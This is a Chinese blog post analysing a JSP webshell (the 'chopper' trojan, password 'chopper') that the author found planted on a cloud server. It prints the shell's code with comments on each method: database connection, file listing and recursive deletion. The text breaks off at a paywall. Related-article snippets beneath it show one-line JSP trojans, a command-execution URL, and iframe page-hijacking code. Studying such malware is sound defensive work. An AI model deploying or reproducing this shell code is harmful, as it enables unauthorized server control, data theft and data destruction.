jsp文件木马代码分析

最新推荐文章于 2024-05-30 07:27:36 发布
最新推荐文章于 2024-05-30 07:27:36 发布
阅读量4k 收藏 2
点赞数 4
分类专栏: Java 文章标签: jsp 木马 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pandaball/article/details/50984805
版权
本文介绍了作者在阿里云服务器上发现的一个名为tst.jsp的文件,该文件经格式化后显示为包含可疑方法的Java代码。通过访问特定URL,能够获取到服务器C盘的文件属性信息。文章探讨了这个木马如何悄无声息地存在于项目中,引发了对于服务器安全性的关注。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

近来登陆阿里云,竟发现webapps/ROOT/下面多了一个tst.jsp

代码格式化了一下,每个方法都注释了下

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%!String Pwd = "chopper";

	String EC(String s, String c) throws Exception {
		return s;
	}//new String(s.getBytes("ISO-8859-1"),c);}
	
	//依照给定的参数s连接数据库
	//以回车符\r\n作为分割
	//第一行是数据库驱动类名
	//第二行是jdbc的url
	//第三行(如果有的话)指定了具体的数据库名
	Connection GC(String s) throws Exception {
		String[] x = s.trim().split("\r\n");
		Class.forName(x[0].trim()).newInstance();
		Connection c = DriverManager.getConnection(x[1].trim());
		if (x.length > 2) {
			c.setCatalog(x[2].trim());
		}
		return c;
	}
	
	//得到系统中所有根目录下 的每一个文件的名字的前两个字母,写入StringBuffer
	void AA(StringBuffer sb) throws Exception {
		File r[] = File.listRoots();
		for (int i = 0; i < r.length; i++) {
			sb.append(r[i].toString().substring(0, 2));
		}
	}
	
	//得到指定路径下所有文件的 文件名、最后一次修改时间、文件大小、是否可读可写属性,写入StringBuffer
	void BB(String s, StringBuffer sb) throws Exception {
		File oF = new File(s), l[] = oF.listFiles();
		String sT, sQ, sF = "";
		java.util.Date dt;
		SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
		for (int i = 0; i < l.length; i++) {
			dt = new java.util.Date(l[i].lastModified());
			sT = fm.format(dt);
			sQ = l[i].canRead() ? "R" : "";
			sQ += l[i].canWrite() ? " W" : "";
			if (l[i].isDirectory()) {
				sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
						+ "\t" + sQ + "\n");
			} else {
				sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
						+ sQ + "\n";
			}
		}
		sb.append(sF);
	}
	
	//迭代删除给定路径下的所有文件和文件夹
	void EE(String s) throws Exception {
		File f = new File(s);
		if (f.isDirectory()) {
			File x[
最低0.47元/天 解锁文章
JSP 木马—》被攻击 学习下
mhjzqq923的专栏
10-13 1459
昨天我的服务器被攻击了,我初步怀疑是通过tomcat的安全漏洞进去的,所以发布了上篇日志进行修补。 刚才工程师告诉我是通过暴力破解ftp进去的,并且新建win用户,搞乱的系统。 我发现我的tomcat服务路径下多了两个 war包 一个是改名为101的,一个名为killbase的 两个路径里都只有一个jsp文件  但代码相同(看来是被两个人攻击了) 该代码大概
jsp 不解析pre_Jsp 小后门,Jsp 一句话木马后门详解
weixin_42146230的博客
01-13 800
一:执行系统命令:无回显执行系统命令:请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,用来反弹个shell很方便。有回显带密码验证的:if("023".equals(request.getParameter("pwd"))){java.io.InputStream in = Runtime.getRuntime().exec...
JSP 木马
seawavecau的专栏
11-11 4348
一款不错的 JSP 木马。大家复制下面的内容。然后另存为 JSP 格式就可以拉。private String _password = "520520";private String _encodeType = "GB2312";private int _sessionOutTime = 20;private String[] _textFileTypes = {"txt", "htm", "h
一个Jsp写的木马文件
蚂蚁的技术总结
07-24 1万+
最近服务器被黑,分析黑客放置的木马文件,这是其中一个,在网上搜索了一下,这个木马很出名,作者是90后,后生可畏! 引用:     这是一个jsp写的木马程序,部署在tomcat的项目根目录下,访问这个jsp,然后服务器的信息,数据库连接,文件系统都可以通过这个jsp访问到。   上传这个jsp文件的用意是:代码都是用的我们最简单的基础知识,基础才是最重要的!!!
一个木马文件--jsp写的
龙企阁
08-04 566
这是一个jsp写的木马程序,部署在tomcat的项目根目录下,访问这个jsp,然后服务器的信息,数据库连接,文件系统都可以通过这个jsp访问到。 上传这个jsp文件的用意是:代码都是用的我们最简单的基础只是,基础才是最重要的!!! &lt;%@page pageEncoding="utf-8"%&gt; &lt;%@page import="java.io.*"%&gt; &lt;%@...
JSP大马文件
08-13
jsp 木马, 放到网站可以访问的目录, 访问页面,即可管理服务器内容.切勿用于非法用途
java jsp 木马_JSP安全开发之XSS漏洞详解
weixin_39991055的博客
12-21 607
前言大家好,好男人就是我,我就是好男人,我就是-0nise。在各大漏洞举报平台,我们时常会看到XSS漏洞。那么问题来了,为何会出现这种漏洞?出现这种漏洞应该怎么修复?正文1.XSS?XSS?XSS是什么鬼?XSS又叫跨站脚本攻击(Cross Site Scripting),我不会告诉他原本是叫CSS的,但是为了不和我们所用的层叠样式表(Cascading Style Sheets)CSS搞混。CS...
安卓与JSP图片及文件上传源码解析
资源摘要信息: "安卓图片上传和文件上传带jsp服务端源码.zip" 1. 安卓图片上传和文件上传功能的实现原理: 安卓图片上传和文件上传功能是移动应用开发中常见的需求,其核心在于将客户端(安卓应用)的数据发送到...
java安全——jsp一句话木马
最新发布
Innocence_0的博客
05-30 2032
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方优快云官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
JSP一句话木马
热门推荐
我的
12-11 2万+
JSP一句话木马  2011-01-13 21:39:42|  分类: 网络技巧 |  标签:jsp  木马  |字号大中小 订阅 1》jsp页面代码 if(req[wiki]UE[/wiki]st.getParameter("f")!=null)(new java.io.FileOutputStream(application.get
木马——文件上传
放弃幻想,准备斗争
04-21 1418
WebShell就是以网页文件形式(asp\php\jsp)存在的一种命令执行环境,客户端通过远程连接,利用W ebS h ell连接到服务器,并可对服务器进行操作。前提是后端一定可以解析这种环境。
网页挂马代码大全
02-22 357
一:框架挂马 <iframe src=地址 width=123 height=0></iframe> 二:js文件挂马 首先将以下代码 document.write("<iframe width='100' height='0' src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代...
jsp写php一句话,asp,aspx,php,jsp下的一句话木马
weixin_36296864的博客
03-13 716
aspx1.相当于ASP的一句话木马:程序代码alter database pubs set RECOVERY FULL--create table pubs.dbo.cmd(a image)backup log pubs to disk = 'c:\TM' with initinsert into pubs.dbo.cmd(a) values ('System.IO.StreamWriter(S...
thinkphp3.1.3 getshell_两个weblogic的漏洞的Getshell验证
weixin_39873456的博客
11-11 1019
本文复现了weblogic的Weblogic CVE-2019-2725和Weblogic CVE-2017-10271两个漏洞,从批量扫描到Getshell的整个过程。主要侧重如何构造Payload去GetShell(所以扫描工具和命令执行的截图是网图),批量扫描和命令执行直接找weblogic在github的几款工具即可。在这里就不分享了,只分享payload请求代码。有问题可以留言。Webl...
JSP文件上传功能实现教程与源码分析
2. **处理上传的文件**:在服务器端,通过JSP代码处理上传的文件。可以使用Java的`HttpServletRequest`类的`getInputStream()`和`getPart()`或`getMultiPart()`方法来获取上传的文件。 3. **设置目录和文件名**:...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值